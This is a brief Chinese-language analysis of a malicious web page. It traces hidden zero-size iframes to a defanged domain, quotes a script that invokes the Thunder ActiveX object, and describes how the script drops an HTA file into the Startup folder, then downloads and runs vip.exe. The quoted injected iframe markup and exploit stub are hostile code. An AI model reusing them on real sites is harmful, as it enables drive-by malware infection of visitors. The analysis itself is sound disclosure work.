浏览该网站时,Kaspersky报告:恶意脚本: 拒绝访问。
检查该网页,发现代码:
/--- <iframe src=hxxp://x*x*.k*o*5***1.com/index.htm width=50 height=0></iframe> ---/
hxxp://x*x*.k*o*5***1.com/index.htm 包含代码:
/--- <iframe src="hxxp://x*x*.k*o*5***1.com/vip.htm" height=0 width=0></iframe> <iframe src="hxxp://x*x*.k*o*5***1.com/vip1.htm" height=0 width=0></iframe> <iframe src="hxxp://x*x*.k*o*5***1.com/vip2.htm" height=0 width=0></iframe> ---/
hxxp://x*x*.k*o*5***1.com/vip.htm 内容为:
/--- <SCRIPT src="vip.js"></SCRIPT> <BODY οnlοad=shit();><BR><BR> ---/
shit()定义在vip.js中:
/--- function shit() { try{qianxu_fan = new ActiveXObject("ThunderServer.webThunder.1");} catch(e){return;} ---/
用来创建ActiveXObject"ThunderServer.webThunder.1"。
vip.js 利用它来的实施:
利用ADODB创建文件:C:/Documents and Settings/All Users/「开始」菜单/程序/启动/microsofts.hta
利用Shell.Run调用IE打开网页 hxxp://www.mv***ps*f.com/kl/vip.exevips.htm,下载病毒文件vip.exe
利用shell.exec运行下载到IE临时文件夹中的病毒文件vip[1].exe
